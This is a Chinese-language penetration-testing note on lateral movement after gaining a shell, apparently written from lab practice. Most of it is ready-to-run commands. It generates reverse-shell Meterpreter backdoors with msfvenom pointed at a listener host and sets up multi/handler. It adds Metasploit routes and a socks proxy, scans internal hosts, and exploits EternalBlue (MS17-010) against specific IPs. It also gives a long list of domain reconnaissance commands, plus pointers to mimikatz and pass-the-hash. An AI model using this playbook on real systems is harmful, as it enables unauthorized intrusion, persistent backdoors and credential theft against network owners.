内网横向思路
内网横向思路
当已经拿到一台机器的shell之后,需要进行内网继续渗透过程。通过自己的实践,得出以下渗透思路。
服务器信息收集
当前shell机器信息收集,获取敏感信息。详细可以看DC1靶场思路,主要是文件敏感信息获取及操作系统有关知识
补充:
-
利用 cs上线受害机
详细看cs使用教程
-
利用mimikatz获取管理员用户密码
注意首先需要提权
-
或者新建账户
内网信息收集和目标定位
-
生成后门木马,获取会话
生成木马: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe 监听模块: use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp set LHOST <IP> set LPORT 1122 set ExitOnSession false // exploit -j -z //将会话在后台挂起 退出命令行,将会话挂到后台 background 重新进入会话 sessions 1 -
通过会话进入命令行,查看受害机信息
ipconfig 获取受害机网卡和ip信息。可以推测内网ip段 arp -a 查看arp缓存,得到内网路由,进一步的到内网信息 -
可以使用让受害机访问外网,本机代理抓包爆破的方式,确定其真实IP
-
msf增加路由:route add 192.168.0.0 255.255.255.0 2,然后查看路由 route print
(如果linux里面有多块网卡时,给会话增加一条默认内网路由让其在内网通信)
msf内网路由、代理设置
在进行内网横向渗透之前有一步非常重要,就是在收集内网信息之后给会话设置内网路由,然后设置代理。
-
设置会话路由(给建立的会话指定路由到内网,与内网进行通信)
在msf中给会话设置路由 route add 192.168.52.0 255.255.255.0 1 内网ip段 子网掩码 会话id 查看路由 route print -
设置本地代理(建立一个socket隧道,使得msf(程序)的流量通过socket代理能够通过路由进入内网通信)
在msf中配置代理 1.打开/etc/proxychains.conf将端口设置为 1080 vi /etc/proxychains.conf [proxylist] socks4 127.0.0.1 1080 2. use auxiliary/sever/socks4a set srvhost 127.0.0.1 run
内网资产扫描
- 使用辅助端口扫描模块扫描,查看所需设置的值.(内网段内主机在线情况及端口开放情况)
use auxiliary/scanner/portscan/tcp
set RHOSTs 192.168.52.0/24
set PORTS 445 3389 6379 80 8080 22
exploit
内网SMB信息扫描
查看139和445端口的开放情况
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.0.201-203
exploit
永恒之蓝攻击
-
查看开放了445端口的机器是否存在永恒之蓝漏洞
auxiliary/scanner/smb/smb_ms17_010 set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.0.201-203 run -
使用永恒之蓝进行攻击
use exploit/windows/smb/ms17_010_psexec set payload windows/x64/meterpreter/reverse_tcp set lhost 47.92.248.200 set rhost 192.168.0.202 set lport 32323
主要进行域渗透拿到域控的那台主机的权限
拿下一台内网机器,首先要定位内网机器的架构。
收集基本信息:
ipconfig /all ------ 查询本机IP段,所在域等
net user ------ 本机用户列表
net localgroup administrators ------ 本机管理员[通常含有域用户]
net user /domain ------ 查询域用户
net ``group` `/domain ------ 查询域里面的工作组
net ``group` `"domain admins"` `/domain ------ 查询域管理员用户组
net localgroup administrators /domain ------ 登录本机的域管理员
net localgroup administrators workgroup\user001 /add ------域用户添加到本机
net ``group` `"domain controllers"` `/domain ------ 查看域控制器(如果有多台)
net time /domain ------ 判断主域,主域服务器都做时间服务器
net config workstation ------ 当前登录域
net session ------ 查看当前会话
net use \\ip\ipc$ pawword /user:username ------ 建立IPC会话[空连接-***]
net share ------ 查看SMB指向的路径[即共享]
net view ------ 查询同一域内机器列表
net view \\ip ------ 查询某IP共享
net view /domain ------ 查询域列表
net view /domain:domainname ------ 查看workgroup域中计算机列表
net start ------ 查看当前运行的服务
net accounts ------ 查看本地密码策略
net accounts /domain ------ 查看域密码策略
nbtstat –A ip ------netbios 查询
netstat –an/ano/anb ------ 网络连接查询
route print ------ 路由表tasklist /V ----- 查看进程[显示对应用户]
tasklist /S ip /U domain\username /P /V ----- 查看远程计算机进程列表
qprocess * ----- 类似tasklist
qprocess /SERVER:IP ----- 远程查看计算机进程列表
nslookup –qt-MX Yahoo.com ----- 查看邮件服务器
whoami /all ----- 查询当前用户权限等
set` `----- 查看系统环境变量
systeminfo ----- 查看系统信息
qwinsta ----- 查看登录情况
qwinsta /SERVER:IP ----- 查看远程登录情况
fsutil fsinfo drives ----- 查看所有盘符
gpupdate /force ----- 更新域策略cmdkey /l ----- 看是否保存了登陆凭证。(攻击者会先查看管理员是否保留了登陆凭证,方便后续的凭证抓取。) echo %logonserver% ----- 查看登陆域
域渗透文章 https://www.cnblogs.com/bmjoker/p/10336247.html
注意hash传递攻击
具体详细步骤请看内网穿透这篇文章
